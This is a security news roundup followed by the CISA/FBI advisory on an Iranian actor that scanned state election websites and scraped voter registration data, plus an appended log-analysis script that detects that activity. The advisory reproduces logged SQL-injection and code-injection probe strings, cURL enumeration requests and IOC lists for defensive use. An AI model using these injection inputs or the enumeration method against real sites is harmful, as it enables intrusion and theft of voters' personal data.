Cybersecurity Updates

Cisco Updates


Source: Threat Post

2021 Healthcare Cybersecurity Priorities: Experts Weigh In
Hackers are putting a bullseye on healthcare. Experts explore why hospitals are being singled out and what any company can do to better protect themselves.

TurkeyBombing Puts New Twist on Zoom Abuse
Threat actors already stole nearly 4,000 credentials before the holiday was even over, according to report.

Cybersecurity Predictions for 2021: Robot Overlords No, Connected Car Hacks Yes
While 2021 will present evolving threats and new challenges, it will also offer new tools and technologies that, we hope, will shift the balance toward the defense.

ThreatList: Cyber Monday Looms – But Shoppers Oblivious to Top Retail Threats
Online shoppers are blissfully unaware of credit card skimming threats and malicious shopping apps as they head into this year's Black Friday and Cyber Monday holiday shopping events.

Federated Learning: A Therapeutic for what Ails Digital Health
Researchers show the promise of Federated Learning to protect patient privacy and improve healthcare outcomes across the world.

Changing Employee Security Behavior Takes More Than Simple Awareness
Designing a behavioral change program requires an audit of existing security practices and where the sticking points are.

Major BEC Phishing Ring Cracked Open with 3 Arrests
Some 50,000 targeted victims have been identified so far in a massive, global scam enterprise that involves 26 different malwares.

Critical MobileIron RCE Flaw Under Active Attack
Attackers are targeting the critical remote code-execution flaw to compromise systems in the healthcare, local government, logistics and legal sectors, among others.

How to Update Your Remote Access Policy – And Why You Should Now
Reducing the risks of remote work starts with updating the access policies of yesterday.

Laser-Based Hacking from Afar Goes Beyond Amazon Alexa
The team that hacked Amazon Echo and other smart speakers using a laser pointer continues to investigate why MEMS microphones respond to light.



Source: Wired.com

It’s Time to Stop Sharing Your Passwords With Your Partner
Go ahead, give them the keys to your heart—but anything more could make a cybersecurity mess.

Trump’s Election Attack Ends December 14—Whether He Knows It or Not
Despite the Trump campaign’s fight to overturn the election, the wheels of American democracy keep turning.

This Bluetooth Attack Can Steal a Tesla Model X in Minutes
The company is rolling out a patch for the vulnerabilities, which allowed one researcher to break into a car in 90 seconds and drive away.

Google Is Testing End-to-End Encryption in Android Messages
For now, the security measure will be available only to people using the beta version of the app.

Secret Service Investigates 700 Cases of Covid Relief Fraud
Ransomware as a service, exposed SMS photos, and more of the week's top security news.

A Facebook Messenger Flaw Could Have Let Hackers Listen In
The vulnerability was found through the company's bug bounty program, now in its tenth year.

Ghostery’s Making a Privacy Browser—and Ad-Free Search Engine
The tracker-blocking company will soon launch a privacy-friendly desktop browser as well.

Telegram Still Hasn’t Removed an AI Bot That’s Abusing Women
A deepfake bot has been generating explicit, non-consensual images on the platform. The researchers who found it say their warnings have been ignored.

Firing Christopher Krebs Crosses a Line—Even for Trump
The president dismissed the widely respected cybersecurity agency director Tuesday night for pushing back against election disinformation.

Forget Impostors. Among Us Is a Playground for Hackers
The blockbuster game of deception has security holes that let cheaters run wild.

Microsoft's Making a Secure PC Chip—With Intel and AMD's Help
The Pluton security processor will give the software giant an even more prominent role in locking down Windows hardware.

Donald Trump Could Still Launch Nuclear Weapons at Any Time
The president's responsibility for the US nuclear arsenal is a Cold War anachronism. The Trump era shows why it needs reform.

7 Simple Tech Tips to Keep Your Family Safe This Holiday
Does your great-aunt Winifred ask for tech support every year? Even if you aren't traveling this year, send your loved ones this advice to show you care.

A Ransomware Gang Bought Facebook Ads to Troll Its Victim
Covid-19 research hacking, the Pentagon's Photoshop antics, and more of the week's top security news.

The OS Big Sur Launch Might Have Slowed Down Macs Everywhere
The issues affected users who didn't upgrade their software, and other Apple services too.

The iOS Covid App Ecosystem Has Become a Privacy Minefield
An analysis of nearly 500 Covid-related apps worldwide shows major differences in how much data they expect you to give up.

The Scammer Who Wanted to Save His Country
Last year, a hacker gave Glenn Greenwald a trove of damning messages between Brazil’s leaders. Some suspected the Russians. The truth was far less boring.

The GOP Keeps Proving There's No Election Fraud
Through numerous legal and other challenges, the Trump campaign and its allies have consistently undermined their argument.

An Engineer Gets 9 Years for Stealing $10M From Microsoft
The defendant tried—and failed—to use bitcoin to cover his tracks.

WhatsApp Using Up Your Phone Storage? Here’s How to Fix It
It's time to do something about those photos and videos automatically saving to your camera roll.



Source: US-Cert

AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data
Original release date: October 30, 2020 | Last revised: November 3, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 8 framework. See the <a href="https://attack.mitre.org/versions/v8/techniques/enterprise/">ATT&amp;CK for Enterprise version 8</a> for all referenced threat actor techniques.</em></p> <p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). CISA and the FBI are aware of an Iranian advanced persistent threat (APT) actor targeting U.S. state websites—to include election websites. CISA and the FBI assess this actor is responsible for&nbsp;the mass dissemination of voter intimidation emails to U.S. citizens and the dissemination of U.S. election-related disinformation in mid-October 2020. <fn value="1">This disinformation (hereinafter, “the propaganda video”) was in the form of a video purporting to misattribute the activity to a U.S. domestic actor and implies that individuals could cast fraudulent ballots, even from overseas. https://www.odni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security. </fn>&nbsp;(Reference FBI FLASH message <a href="https://www.ic3.gov/Media/News/2020/201030.pdf">ME-000138-TT</a>, disseminated October 29, 2020). Further evaluation by CISA and the FBI has identified the targeting of U.S. state election websites was an intentional effort to influence and interfere with the 2020 U.S. 
presidential election.</p> <p>Click <a href="https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A-Iranian_Advanced_Persistent_Threat_Actor_Identified_Obtaining_Voter_Registration_Data.pdf">here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><p>Analysis by CISA and the FBI indicates this actor scanned state websites, to include state election websites, between September 20 and September 28, 2020, with the Acunetix vulnerability scanner (<em>Active Scanning: Vulnerability Scanning</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1595/002/">T1595.002</a>]). Acunetix is a widely used and legitimate web scanner, which has been used by threat actors for nefarious purposes. Organizations that do not regularly use Acunetix should monitor their logs for any activity from the program that originates from IP addresses provided in this advisory and consider it malicious reconnaissance behavior.&nbsp;</p> <p>Additionally, CISA and the FBI observed this actor attempting to exploit websites to obtain copies of voter registration data between September 29 and October 17, 2020 (<em>Exploit Public-Facing Application</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1190/">T1190</a>]). This includes attempted exploitation of known vulnerabilities, directory traversal, Structured Query Language (SQL) injection, web shell uploads, and leveraging unique flaws in websites.&nbsp;</p> <p>CISA and the FBI can confirm that the actor successfully obtained voter registration data in at least one state. The access of voter registration data appeared to involve the abuse of website misconfigurations and a scripted process using the cURL tool to iterate through voter records. 
A review of the records that were copied and obtained reveals the information was used in the propaganda video.</p> <p>CISA and FBI analysis of identified activity against state websites, including state election websites, referenced in this product cannot all be fully attributed to this Iranian APT actor. FBI analysis of the Iranian APT actor’s activity has identified targeting of U.S. elections’ infrastructure (<em>Compromise Infrastructure</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1584/">T1584</a>]) within a similar timeframe, use of IP addresses and IP ranges—including numerous virtual private network (VPN) service exit nodes—which correlate to this Iran APT actor (<em>Gather Victim Host Information</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1592/">T1592</a>]), and other investigative information.</p> <h2>Reconnaissance</h2> <p>The FBI has information indicating this Iran-based actor attempted to access PDF documents from state voter sites using advanced open-source queries (<em>Search Open Websites and Domains</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1593">T1593</a>]). 
The actor demonstrated interest in PDFs hosted on URLs with the words “vote” or “voter” and “registration.” The FBI identified queries of URLs for election-related sites.</p> <p>The FBI also has information indicating the actor researched the following information in a suspected attempt to further their efforts to survey and exploit state election websites.</p> <ul> <li>YOURLS exploit</li> <li>Bypassing ModSecurity Web Application Firewall</li> <li>Detecting Web Application Firewalls</li> <li>SQLmap tool</li> </ul> <h3>Acunetix Scanning</h3> <p>CISA’s analysis identified the scanning of multiple entities by the Acunetix Web Vulnerability scanning platform between September 20 and September 28, 2020 (<em>Active Scanning: Vulnerability Scanning</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1595/002/">T1595.002</a>]).</p> <p>The actor used the scanner to attempt SQL injection into various fields in <code>/registration/registration/details</code> with status codes 404 or 500.</p> <p><code>/registration/registration/details?addresscity=-1 or 3*2&lt;(0+5+513-513) -- &amp;addressstreet1=xxxxx&amp;btnbeginregistration=begin voter 
registration&amp;btnnextelectionworkerinfo=next&amp;btnnextpersonalinfo=next&amp;btnnextresdetails=next&amp;btnnextvoterinformation=next&amp;btnsubmit=submit&amp;chkageverno=on&amp;chkageveryes=on&amp;chkcitizenno=on&amp;chkcitizenyes=on&amp;chkdisabledvoter=on&amp;chkelectionworker=on&amp;chkresprivate=1&amp;chkstatecancel=on&amp;dlnumber=1&amp;dob=xxxx/x/x&amp;email=sample@email.tst&amp;firstname=xxxxx&amp;gender=radio&amp;hdnaddresscity=&amp;hdngender=&amp;last4ssn=xxxxx&amp;lastname=xxxxxinjjeuee&amp;mailaddresscountry=sample@xxx.xxx&amp;mailaddressline1=sample@email.tst&amp;mailaddressline2=sample@xxx.xxx&amp;mailaddressline3=sample@xxx.xxx&amp;mailaddressstate=aa&amp;mailaddresszip=sample@xxxx.xxx&amp;mailaddresszipex=sample@xxx.xxx&amp;middlename=xxxxx&amp;overseas=1&amp;partycode=a&amp;phoneno1=xxx-xxx-xxxx&amp;phoneno2=xxx-xxx-xxxx&amp;radio=consent&amp;statecancelcity=xxxxxxx&amp;statecancelcountry=usa&amp;statecancelstate=XXaa&amp;statecancelzip=xxxxx&amp;statecancelzipext=xxxxx&amp;suffixname=esq&amp;txtmailaddresscity=sample@xxx.xxx</code></p> <h3>Requests</h3> <p>The actor used the following requests associated with this scanning activity.</p> <p><code>2020-09-26 13:12:56 x.x.x.x GET /x/x v[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 0</code></p> <p><code>2020-09-26 13:13:19 X.X.x.x GET /x/x voterid[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 1375</code></p> <p><code>2020-09-26 13:13:18 .X.x.x GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 - X.X.x.x&nbsp;</code></p> <h3>User Agents Observed</h3> <p>CISA and FBI have observed the following user agents associated with this scanning activity.</p> <p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0&nbsp;</code></p> 
<p><code>Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4</code></p> <p><code>Mozilla/5.0+(X11;+U;+Linux+i686;+en-US;+rv:1.8.1.17)+Gecko/20080922+Ubuntu/7.10+(gutsy)+Firefox/2.0.0.17</code></p> <h2>Exfiltration</h2> <h3>Obtaining Voter Registration Data</h3> <p>Following the review of web server access logs, CISA analysts, in coordination with the FBI, found instances of the cURL and FDM User Agents sending GET requests to a web resource associated with voter registration data. The activity occurred between September 29 and October 17, 2020. Suspected scripted activity submitted several hundred thousand queries iterating through voter identification values, and retrieving results with varying levels of success (<em>Gather Victim Identity Information</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1589/">T1589</a>]). A sample of the records identified by the FBI reveals they match information in the aforementioned propaganda video.</p> <h3>Requests</h3> <p>The actor used the following requests.</p> <p><code>2020-10-17 13:07:51 x.x.x.x GET /x/x voterid=XXXX1 443 - x.x.x.x curl/7.55.1 - 200 0 0 1406</code></p> <p><code>2020-10-17 13:07:55 x.x.x.x GET /x/x voterid=XXXX2 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390</code></p> <p><code>2020-10-17 13:07:58 x.x.x.x GET /x/x voterid=XXXX3 443 - x.x.x.x curl/7.55.1 - 200 0 0 1625</code></p> <p><code>2020-10-17 13:08:00 x.x.x.x GET /x/x voterid=XXXX4 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390</code></p> <p>Note: incrementing <code>voterid</code> values in the <code>cs_uri_query</code> field.</p> <h3>User Agents</h3> <p>CISA and FBI have observed the following user agents.</p> <p><code>FDM+3.x</code></p> <p><code>curl/7.55.1</code></p> <p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0</code></p> <p><code>Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4</code></p> <p>See figure 1 
below for a timeline of the actor’s malicious activity.</p> <p><img alt="" data-entity-type="file" data-entity-uuid="b752a4ee-19a8-4f25-824d-d036cf917f5c" height="240" src="https://us-cert.cisa.gov/sites/default/files/2020-10/Technical%20Findings.png" width="817" /></p> <p class="text-align-center"><em>Figure 1: Overview of malicious activity</em></p> <h3>Mitigations</h3><h2>Detection</h2> <h3>Acunetix Scanning</h3> <p>Organizations can identify Acunetix scanning activity by using the following keywords while performing log analysis.</p> <ul> <li><code>$acunetix</code></li> <li><code>acunetix_wvs_security_test</code></li> </ul> <h3>Indicators of Compromise</h3> <p>For a downloadable copy of IOCs, see <a href="https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A.stix.xml">AA20-304A.stix</a>.</p> <p><strong>Disclaimer:</strong> <em>many of the IP addresses included below likely correspond to publicly available VPN services, which can be used by individuals all over the world. This creates the potential for a significant number of false positives; only activity listed in this advisory warrants further investigation. 
The actor likely uses various IP addresses and VPN services.</em></p> <p>The following IPs have been associated with this activity.</p> <ul> <li>102.129.239[.]185 (Acunetix Scanning)</li> <li>143.244.38[.]60 (Acunetix Scanning and cURL requests)</li> <li>45.139.49[.]228 (Acunetix Scanning)</li> <li>156.146.54[.]90 (Acunetix Scanning)</li> <li>109.202.111[.]236 (cURL requests)</li> <li>185.77.248[.]17 (cURL requests)</li> <li>217.138.211[.]249 (cURL requests)</li> <li>217.146.82[.]207 (cURL requests)</li> <li>37.235.103[.]85 (cURL requests)</li> <li>37.235.98[.]64 (cURL requests)</li> <li>70.32.5[.]96 (cURL requests)</li> <li>70.32.6[.]20 (cURL requests)</li> <li>70.32.6[.]8 (cURL requests)</li> <li>70.32.6[.]97 (cURL requests)</li> <li>70.32.6[.]98 (cURL requests)</li> <li>77.243.191[.]21 (cURL requests and FDM+3.x [Free Download Manager v3] enumeration/iteration)</li> <li>92.223.89[.]73 (cURL requests)</li> </ul> <p>CISA and the FBI are aware the following IOCs have been used by this Iran-based actor. 
These IP addresses facilitated the mass dissemination of voter intimidation email messages on October 20, 2020.</p> <ul> <li>195.181.170[.]244 (Observed September 30 and October 20, 2020)</li> <li>102.129.239[.]185 (Observed September 30, 2020)</li> <li>104.206.13[.]27 (Observed September 30, 2020)</li> <li>154.16.93[.]125 (Observed September 30, 2020)</li> <li>185.191.207[.]169 (Observed September 30, 2020)</li> <li>185.191.207[.]52 (Observed September 30, 2020)</li> <li>194.127.172[.]98 (Observed September 30, 2020)</li> <li>194.35.233[.]83 (Observed September 30, 2020)</li> <li>198.147.23[.]147 (Observed September 30, 2020)</li> <li>198.16.66[.]139 (Observed September 30, 2020)</li> <li>212.102.45[.]3 (Observed September 30, 2020)</li> <li>212.102.45[.]58 (Observed September 30, 2020)</li> <li>31.168.98[.]73 (Observed September 30, 2020)</li> <li>37.120.204[.]156 (Observed September 30, 2020)</li> <li>5.160.253[.]50 (Observed September 30, 2020)</li> <li>5.253.204[.]74 (Observed September 30, 2020)</li> <li>64.44.81[.]68 (Observed September 30, 2020)</li> <li>84.17.45[.]218 (Observed September 30, 2020)</li> <li>89.187.182[.]106 (Observed September 30, 2020)</li> <li>89.187.182[.]111 (Observed September 30, 2020)</li> <li>89.34.98[.]114 (Observed September 30, 2020)</li> <li>89.44.201[.]211 (Observed September 30, 2020)</li> </ul> <h2>Recommendations</h2> <p>The following list provides recommended self-protection mitigation strategies against cyber techniques used by advanced persistent threat actors:</p> <ul> <li>Validate input as a method of sanitizing untrusted input submitted by web application users. Validating input can significantly reduce the probability of successful exploitation by providing protection against security flaws in web applications. 
The types of attacks possibly prevented include SQL injection, Cross-Site Scripting (XSS), and command injection.</li> <li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable unnecessary services and install available patches for the services in use. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li> <li>Verify all cloud-based virtual machine instances with a public IP, and avoid using open RDP ports, unless there is a valid need. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.</li> <li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li> <li>Apply multi-factor authentication, when possible.</li> <li>Maintain a good information back-up strategy by routinely backing up all critical data and system configuration information on a separate device. Store the backups offline, verify their integrity, and verify the restoration process.</li> <li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.</li> <li>When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.</li> <li>Ensure third parties that require RDP access follow internal remote access policies.</li> <li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li> <li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs. 
However, recognize that the security of a VPN matches the security of the devices connected to it.</li> <li>Use security features provided by social media platforms; use <a href="https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords">strong passwords</a>, change passwords frequently, and use a different password for each social media account.</li> <li>See CISA’s Tip on <a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">Best Practices for Securing Election Systems</a> for more information.</li> </ul> <h3>General Mitigations</h3> <p><em><strong>Keep applications and systems updated and patched</strong></em></p> <p>Apply all available software updates and patches and automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed with which threat actors create new exploits following the release of a patch. These “N-day” exploits can be as damaging as zero-day exploits. Ensure the authenticity and integrity of vendor updates by using signed updates delivered over protected links. Without the rapid and thorough application of patches, threat actors can operate inside a defender’s patch cycle. 
<fn value="2">NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies" https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Additionally, use tools (e.g., the OWASP Dependency-Check Project tool <fn value="3">https://owasp.org/www-project-dependency-check/</fn>) to identify the publicly known vulnerabilities in third-party libraries depended upon by the application.</p> <p><em><strong>Scan web applications for SQL injection and other common web vulnerabilities</strong></em></p> <p>Implement a plan to scan public-facing web servers for common web vulnerabilities (e.g., SQL injection, cross-site scripting) by using a commercial web application vulnerability scanner in combination with a source code scanner. <fn value="4">https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm</fn> Fixing or patching vulnerabilities after they are identified is especially crucial for networks hosting older web applications. As sites get older, more vulnerabilities are discovered and exposed.</p> <p><em><strong>Deploy a web application firewall</strong></em></p> <p>Deploy a web application firewall (WAF) to prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.</p> <p><em><strong>Deploy techniques to protect against web shells</strong></em></p> <p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. 
<fn value="5">NSA &amp; ASD "CyberSecurity Information: Detect and Prevent Web Shell Malware" https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF</fn> Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.&nbsp;</p> <p><em><strong>Use multi-factor authentication for administrator accounts</strong></em></p> <p>Prioritize protection for accounts with elevated privileges, remote access, or used on high-value assets. <fn value="6">https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs</fn> Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). <fn value="7">NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies" https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p> <p><em><strong>Remediate critical web application security risks</strong></em></p> <p>First, identify and remediate critical web application security risks. Next, move on to other less critical vulnerabilities. 
Follow available guidance on securing web applications. <fn value="8">NSA “Building Web Applications – Security for Developers” https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm</fn> <fn value="9">https://owasp.org/www-project-top-ten/</fn> <fn value="10">https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html</fn></p> <h2>How do I respond to unauthorized access to election-related systems?</h2> <h3>Implement your security incident response and business continuity plan</h3> <p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p> <h3>Contact CISA or law enforcement immediately</h3> <p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href="mailto:Central@cisa.gov">Central@cisa.gov</a> or 888-282-0870) or the FBI through a local field office or the FBI’s Cyber Division (<a href="mailto:CyWatch@ic.fbi.gov">CyWatch@ic.fbi.gov</a> or 855-292-3937).</p> <h2>Resources</h2> <ul> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">Best Practices for Securing Election Systems</a></li> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST16-001">Securing Voter Registration Data</a></li> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST18-006">Website Security</a></li> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">Avoiding Social Engineering and Phishing Attacks</a></li> <li>CISA Tip: <a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">Securing Network Infrastructure 
Devices</a>&nbsp;</li> <li>Joint Advisory: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a></li> <li>CISA Insights: <a href="https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf">Actions to Counter Email-Based Attacks on Election-related Entities</a>&nbsp;</li> <li>FBI and CISA Public Service Announcement (PSA): <a href="https://ic3.gov/Media/Y2020/PSA201002">Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA201001">Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a>&nbsp;</li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200930">Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a>&nbsp;</li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200928">False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. 
Elections</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200924">Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200922">Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Result</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 30, 2020: Initial Version</li> <li>November 3, 2020: Updated IOC disclaimer to emphasize that only activity listed in this alert warrants further investigation.</li> </ul>
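
The Detection and Exfiltration sections of AA20-304A above give two log-level signals: the Acunetix keywords ($acunetix, acunetix_wvs_security_test) in request query strings, and scripted cURL/FDM requests stepping through consecutive voterid values. The script below is an added example, not part of the advisory or of any CISA tooling, that applies both checks to IIS W3C access-log lines. It assumes the 15-field layout of the advisory's sample lines; the log lines, IP addresses (documentation ranges) and voterid values are constructed, not the advisory's IOCs, and the run-length threshold is a tunable assumption.

```python
"""Added example (not code from the CISA/FBI advisory): apply the detection
guidance of AA20-304A to IIS W3C access-log lines.

Flags two behaviours:
  1. Acunetix markers in the query string ($acunetix,
     acunetix_wvs_security_test), the keywords the advisory lists; and
  2. scripted enumeration: one client with a scripting User-Agent (curl or
     FDM, as in the advisory's samples) requesting consecutive voterid values.

Assumed field layout (the advisory's 15-field samples): date time s-ip
cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent)
cs(Referer) sc-status sc-substatus sc-win32-status time-taken. IIS logs
spaces inside the User-Agent as '+', so a whitespace split is safe.
"""
import re
import sys
from collections import defaultdict

ACUNETIX_MARKERS = ("$acunetix", "acunetix_wvs_security_test")
SCRIPTED_UA = re.compile(r"^(curl/|FDM\+)")   # logged forms of curl/x.y and "FDM 3.x"
VOTERID_RE = re.compile(r"(?:^|&)voterid=(\d+)(?:&|$)")
FIELDS = ("date", "time", "s_ip", "method", "uri_stem", "uri_query", "port",
          "username", "c_ip", "user_agent", "referer", "status", "substatus",
          "win32_status", "time_taken")

# Constructed sample log: documentation-range IPs, made-up voterid values.
SAMPLE_LOG = """
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-09-26 13:12:56 198.51.100.10 GET /x/x v[$acunetix]=1 443 - 203.0.113.5 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 0
2020-09-26 13:13:18 198.51.100.10 GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 - 203.0.113.5 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0
2020-10-17 13:07:51 198.51.100.10 GET /x/x voterid=100001 443 - 203.0.113.9 curl/7.55.1 - 200 0 0 1406
2020-10-17 13:07:55 198.51.100.10 GET /x/x voterid=100002 443 - 203.0.113.9 curl/7.55.1 - 200 0 0 1390
2020-10-17 13:07:58 198.51.100.10 GET /x/x voterid=100003 443 - 203.0.113.9 curl/7.55.1 - 200 0 0 1625
2020-10-17 13:08:00 198.51.100.10 GET /x/x voterid=100004 443 - 203.0.113.9 curl/7.55.1 - 200 0 0 1390
2020-10-17 13:08:30 198.51.100.10 GET /x/x voterid=500010 443 - 203.0.113.33 FDM+3.9 - 200 0 0 1402
2020-10-17 13:08:31 198.51.100.10 GET /x/x voterid=500011 443 - 203.0.113.33 FDM+3.9 - 200 0 0 1398
2020-10-17 13:08:32 198.51.100.10 GET /x/x voterid=500012 443 - 203.0.113.33 FDM+3.9 - 200 0 0 1410
2020-10-17 13:09:00 198.51.100.10 GET /x/x voterid=200123 443 - 203.0.113.20 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 1390
2020-10-17 13:09:05 198.51.100.10 GET /x/x voterid=300777 443 - 203.0.113.41 curl/7.55.1 - 200 0 0 1391
"""


def parse_line(line):
    """Split one W3C log line into a dict; None for comment or malformed lines."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def is_acunetix(entry):
    """True when the query string carries an Acunetix scanner marker."""
    return any(marker in entry["uri_query"] for marker in ACUNETIX_MARKERS)


def longest_increment_run(values):
    """Length of the longest run of consecutive integers (n, n+1, n+2, ...)."""
    best = run = 1 if values else 0
    for prev, cur in zip(values, values[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def analyze(lines, threshold=3):
    """Return (acunetix_hits, enumerators).

    acunetix_hits: list of (client_ip, query) carrying scanner markers.
    enumerators:   {client_ip: longest run of consecutive voterid values} for
                   scripting clients whose run reaches `threshold`.
    """
    acunetix_hits = []
    per_client = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if is_acunetix(entry):
            acunetix_hits.append((entry["c_ip"], entry["uri_query"]))
        match = VOTERID_RE.search(entry["uri_query"])
        if match and SCRIPTED_UA.match(entry["user_agent"]):
            per_client[entry["c_ip"]].append(int(match.group(1)))
    enumerators = {}
    for ip, ids in per_client.items():
        run = longest_increment_run(ids)
        if run >= threshold:
            enumerators[ip] = run
    return acunetix_hits, enumerators


if __name__ == "__main__":
    # Pass a log file path to scan real data; otherwise the constructed sample runs.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG.splitlines()
    hits, found = analyze(lines)
    for ip, query in hits:
        print(f"ACUNETIX  {ip}  {query}")
    for ip, run in found.items():
        print(f"ENUMERATE {ip}  {run} consecutive voterid values from a scripting client")
```

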